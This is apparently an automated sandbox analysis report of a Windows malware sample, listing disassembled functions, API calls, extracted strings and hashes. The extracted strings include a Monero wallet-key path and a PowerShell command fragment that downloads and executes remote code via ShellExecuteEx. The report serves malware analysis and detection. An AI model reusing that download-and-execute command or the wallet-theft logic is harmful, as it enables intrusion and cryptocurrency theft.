                                  • Instruction ID: 120a4531dbc24c3c584fb139a5d6211ee47ca128e9323154ceaec6fc135cd360
                                  • Opcode Fuzzy Hash: 3370fb4f6b394c233c7e4a3b0bde0336f09bdbb3fa829f771ae905f524a335ba
                                  • Instruction Fuzzy Hash: 5A01F4B5A40308BBEB00DBE4DC49FBEB7B8EB88745F108555FA09A7281D67455408B96
                                  Function 005492E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(:T,80000000,00000003,00000000,00000003,00000080,00000000,?,00543AEE,?), ref: 005492FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:T), ref: 00549319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00549327
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :T$:T
                                  • API String ID: 1378416451-764083415
                                  • Opcode ID: 1d9d3c83ff3b5bfb173c97edc538a1ac8db59ce0984ff7df5da52861df9901b0
                                  • Instruction ID: a0ed63e3a4e3661e7b8aa3ed6dbef2afb2fb1b53ef3a768682af6fefe437fd88
                                  • Opcode Fuzzy Hash: 1d9d3c83ff3b5bfb173c97edc538a1ac8db59ce0984ff7df5da52861df9901b0
                                  • Instruction Fuzzy Hash: CCF0AF74E00208BBEB14DFB0DC0AF9E7BB9FB88350F10CA54B615E72C0D6749A408B84
                                  Function 005440B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 005440D5
                                  • RegOpenKeyExA.ADVAPI32(80000001,011FDBA0,00000000,00020119,?), ref: 005440F4
                                  • RegQueryValueExA.ADVAPI32(?,011FE5C0,00000000,00000000,00000000,000000FF), ref: 00544118
                                  • RegCloseKey.ADVAPI32(?), ref: 00544122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544147
                                  • lstrcat.KERNEL32(?,011FE4A0), ref: 0054415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 19e3359dc024dbcd8fafc5cb5aa1cc64be1db6e7ce0ed03a86aad03722664af6
                                  • Instruction ID: 6f0fb83424af48f29c28e3a9a580f3d26fe0e20c628c79e5a840be28de1d7c05
                                  • Opcode Fuzzy Hash: 19e3359dc024dbcd8fafc5cb5aa1cc64be1db6e7ce0ed03a86aad03722664af6
                                  • Instruction Fuzzy Hash: 4D4168B69001087BEB14FBB0DC4AFFE777DBBC8340F408558B61A56181EA755BC88B92
                                  Function 005399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                  • LocalFree.KERNEL32(0053148F), ref: 00539A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: a77eb2933748b4f1aaa7dab1a49284f4be1a2dace096e4204e17dd5704d97171
                                  • Instruction ID: 64d19bf81eae742f210bb874a68c9f7c5beffcd13e4fe750bd9cc2d7b6129b12
                                  • Opcode Fuzzy Hash: a77eb2933748b4f1aaa7dab1a49284f4be1a2dace096e4204e17dd5704d97171
                                  • Instruction Fuzzy Hash: C2314DB4A00209EFDB14DF94C885BEE7BB5FF88341F108258E905A7290D778A981CFA1
                                  Function 0054C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: 454644a613c952a833e4edeb4bda83c322fe379158f9cc82f8e839c6d42839c9
                                  • Instruction ID: 63411964d10df9fdc51dff90d242e04d57109ce9e50ab45002bf9c8e32a779aa
                                  • Opcode Fuzzy Hash: 454644a613c952a833e4edeb4bda83c322fe379158f9cc82f8e839c6d42839c9
                                  • Instruction Fuzzy Hash: 8D41E87150175CAEDB218B248C84FFB7FF8BB85708F1444E8E98A86182D271AA44DF60
                                  Function 00544780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,011FE608), ref: 005447DB
                                    • Part of subcall function 00548DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00548E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544801
                                  • lstrcat.KERNEL32(?,?), ref: 00544820
                                  • lstrcat.KERNEL32(?,?), ref: 00544834
                                  • lstrcat.KERNEL32(?,011EB8D8), ref: 00544847
                                  • lstrcat.KERNEL32(?,?), ref: 0054485B
                                  • lstrcat.KERNEL32(?,011FDB20), ref: 0054486F
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 00548D90: GetFileAttributesA.KERNEL32(00000000,?,00531B54,?,?,0055564C,?,?,00550E1F), ref: 00548D9F
                                    • Part of subcall function 00544570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00544580
                                    • Part of subcall function 00544570: RtlAllocateHeap.NTDLL(00000000), ref: 00544587
                                    • Part of subcall function 00544570: wsprintfA.USER32 ref: 005445A6
                                    • Part of subcall function 00544570: FindFirstFileA.KERNEL32(?,?), ref: 005445BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 0b46ea4379b553ae1b0986286d58527ddf3e588091ceba5d3ed985e64dbf6382
                                  • Instruction ID: 823d5dfcaaccc16bcabdca0635d64ba2cf2f3d40fefdbc76a46719e09acadf9f
                                  • Opcode Fuzzy Hash: 0b46ea4379b553ae1b0986286d58527ddf3e588091ceba5d3ed985e64dbf6382
                                  • Instruction Fuzzy Hash: 62315FB2900209A7DB11FBB0DC89EED777CBB98704F404599B32996081EE7497C98F96
                                  Function 00542C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00542D85
                                  Strings
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00542D04
                                  • <, xrefs: 00542D39
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00542CC4
                                  • ')", xrefs: 00542CB3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 4c4bb562e34a029516c600cbaac436e415795e1cea0fb742f3cb3d6bb2445abf
                                  • Instruction ID: 63ba078998c863d55b87cdd25c319ea3c4c55bc0cbdbaf54eec075556ae07f8c
                                  • Opcode Fuzzy Hash: 4c4bb562e34a029516c600cbaac436e415795e1cea0fb742f3cb3d6bb2445abf
                                  • Instruction Fuzzy Hash: 0941ED71C502099AEB54FFA0C89ABEDBF78FF54308F504019F406A6192EF742A4ACF91
                                  Function 00539E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00539F41
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: 895c72d04c81f57c58616919881add2c5d602830853741b5d0759b6d9f0401fd
                                  • Instruction ID: b7e6e1f4f04c61fa63d4b3ca12eaf52fad16f0bdcb4a38347e304510247952bb
                                  • Opcode Fuzzy Hash: 895c72d04c81f57c58616919881add2c5d602830853741b5d0759b6d9f0401fd
                                  • Instruction Fuzzy Hash: A3612F71A50249ABDB28EFA4CC9AFED7B75FF84304F008418F90A5B191EB746A05CB52
                                  Function 005470D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • memset.MSVCRT ref: 0054716A
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0054718C
                                  • sT, xrefs: 00547111
                                  • sT, xrefs: 005472AE, 00547179, 0054717C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemset
                                  • String ID: sT$sT$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 4047604823-1825640323
                                  • Opcode ID: 44b519c9db0019cf173813d559aacde1963c79e47c59d0319b0b7a69fadc9d65
                                  • Instruction ID: 408324155dd90db819202dc195a05a5cece2dfcedba179b21babe87d3d005f94
                                  • Opcode Fuzzy Hash: 44b519c9db0019cf173813d559aacde1963c79e47c59d0319b0b7a69fadc9d65
                                  • Instruction Fuzzy Hash: D75190B0D0421D9BDB64EBA0DC89BEEBB74FF48308F1044A9E50576181EB742E88CF55
                                  Function 00547E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00547E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,011EC278,00000000,00020119,?), ref: 00547E5E
                                  • RegQueryValueExA.ADVAPI32(?,011FDAA0,00000000,00000000,000000FF,000000FF), ref: 00547E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00547E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 27fbebb5f93ceab063d6d879cdee87985b1611d720967b306dbe7ef2b48cfce3
                                  • Instruction ID: f2b912cbe35a50b1f737823134f70785e9bfb1a4897a6876a9374a37a3c68cfb
                                  • Opcode Fuzzy Hash: 27fbebb5f93ceab063d6d879cdee87985b1611d720967b306dbe7ef2b48cfce3
                                  • Instruction Fuzzy Hash: B9116DB1A44209FBE704CB94DC49FBFBBBCFB48745F108259F609A7280D77858008BA2
                                  Function 00549260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(011FE230,?,?,?,0054140C,?,011FE230,00000000), ref: 0054926C
                                  • lstrcpyn.KERNEL32(0077AB88,011FE230,011FE230,?,0054140C,?,011FE230), ref: 00549290
                                  • lstrlen.KERNEL32(?,?,0054140C,?,011FE230), ref: 005492A7
                                  • wsprintfA.USER32 ref: 005492C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
